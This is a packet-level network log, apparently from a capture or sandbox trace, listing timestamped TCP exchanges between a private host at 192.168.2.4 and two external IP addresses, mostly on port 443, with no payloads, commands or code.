Oct 30, 2024 19:47:12.330277920 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:12.330346107 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:12.330425978 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:12.364667892 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:12.364686012 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:12.364795923 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:12.364828110 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:12.364873886 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:12.487988949 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:12.488004923 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:12.488133907 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:12.488162994 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:12.488205910 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:12.576941013 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:12.576957941 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:12.577122927 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:12.577153921 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:12.577203989 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:12.612565994 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:12.612581968 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:12.612677097 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:12.612689972 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:12.612730026 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:12.735363960 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:12.735383987 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:12.735512018 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:12.735548019 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:12.735593081 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:12.823724031 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:12.823744059 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:12.823781967 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:12.823815107 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:12.823831081 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:12.823852062 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:12.859766960 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:12.859791040 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:12.859847069 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:12.859879017 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:12.859891891 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:12.859915972 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:12.982290983 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:12.982311010 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:12.982418060 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:12.982448101 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:12.982490063 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:12.983774900 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:12.983795881 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:12.983872890 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:12.983880997 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:12.983928919 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:13.105912924 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.105931997 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.106092930 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:13.106121063 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.106170893 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:13.107687950 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.107703924 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.107770920 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:13.107777119 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.107816935 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:13.229826927 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.229846954 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.229973078 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:13.229988098 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.230030060 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:13.332729101 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.332755089 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.332842112 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:13.332859993 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.332906008 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:13.353590965 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.353611946 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.353660107 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:13.353668928 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.353699923 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:13.353724003 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:13.355304003 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.355324030 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.355390072 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:13.355396986 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.355422974 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:13.355442047 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:13.476816893 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.476840973 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.477087975 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:13.477128983 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.477176905 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:13.519143105 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.519167900 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.519344091 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:13.519376993 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.519422054 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:13.599790096 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.599824905 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.599927902 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:13.599965096 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.600008965 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:13.600931883 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.600950956 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.601006031 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:13.601012945 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.601047993 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:13.722888947 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.722912073 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.723031044 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:13.723063946 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.723113060 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:13.723937035 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.723953009 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.724015951 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:13.724030972 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.724064112 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:13.846210957 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.846235991 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.846323013 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:13.846355915 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.846400976 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:13.846993923 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.847011089 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.847074032 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:13.847083092 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.847119093 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:13.848529100 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.848545074 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.848607063 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:13.848614931 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.848654985 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:13.969969034 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.969990015 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.970025063 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:13.970051050 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.970066071 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:13.970092058 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:13.971012115 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.971028090 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.971067905 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:13.971076012 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:13.971108913 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.073924065 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.073947906 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.073992968 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.074026108 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.074040890 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.074062109 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.094608068 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.094631910 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.094671011 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.094690084 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.094713926 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.094737053 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.095614910 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.095629930 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.095679045 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.095688105 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.095714092 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.095731020 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.216428041 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.216450930 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.216490984 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.216516018 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.216532946 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.216546059 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.217403889 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.217422962 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.217452049 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.217461109 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.217493057 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.217508078 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.258155107 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.258178949 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.258213997 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.258235931 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.258250952 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.258271933 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.340392113 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.340415955 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.340454102 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.340466022 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.340487957 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.340508938 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.340958118 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.340975046 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.341015100 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.341021061 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.341041088 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.341061115 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.381674051 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.381699085 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.381747961 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.381769896 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.381788015 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.381814957 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.433473110 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:14.433542967 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:14.463913918 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.463937998 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.463990927 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.464009047 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.464040995 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.464057922 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.464579105 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.464597940 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.464663029 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.464673042 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.464720011 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.504852057 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.504873991 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.504935026 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.504945993 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.504985094 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.586802959 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.586824894 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.586862087 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.586878061 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.586903095 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.586910963 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.587853909 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.587868929 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.587907076 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.587914944 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.587941885 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.587954998 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.588967085 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.588983059 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.589024067 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.589030981 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.589087009 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.701467037 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.701493025 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.701544046 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.701562881 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.701572895 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.701596975 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.711035967 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.711059093 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.711147070 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.711159945 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.711209059 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.712017059 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.712037086 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.712084055 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.712094069 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.712117910 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.712136984 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.752904892 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.752923965 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.752984047 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.752998114 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.753042936 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.833805084 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.833830118 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.833889961 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.833899021 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.833956957 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.834778070 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.834795952 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.834896088 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.834903955 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.835000992 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.874767065 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.874793053 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.874829054 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.874835968 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.874887943 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.874887943 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.922717094 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.922738075 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.922856092 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.922863007 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.922894001 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.922976017 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.957742929 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.957762957 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.957853079 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.957869053 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.958642006 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.958662987 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.958756924 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.958756924 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.958765984 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.959319115 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.999052048 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.999075890 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.999259949 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:14.999268055 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:14.999680996 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.081310034 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.081332922 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.082298040 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.082351923 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.082355976 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.082370996 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.082405090 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.082437992 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.082437992 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.083085060 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.083100080 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.083223104 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.083229065 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.083586931 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.122514963 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.122534990 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.122627020 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.122633934 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.122751951 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.212655067 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.212675095 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.213062048 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.213069916 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.213187933 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.213325977 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.213340998 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.213413000 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.213413000 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.213419914 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.213779926 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.214118958 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.214137077 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.214349985 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.214355946 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.214823961 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.245834112 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.245852947 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.245939970 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.245939970 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.245949984 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.246049881 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.293371916 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.293392897 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.293577909 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.293585062 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.293720961 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.336841106 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.336863995 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.336941004 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.336941004 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.336949110 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.337034941 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:15.337599993 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:15.337618113 CET	443	49731	87.106.236.48	192.168.2.4
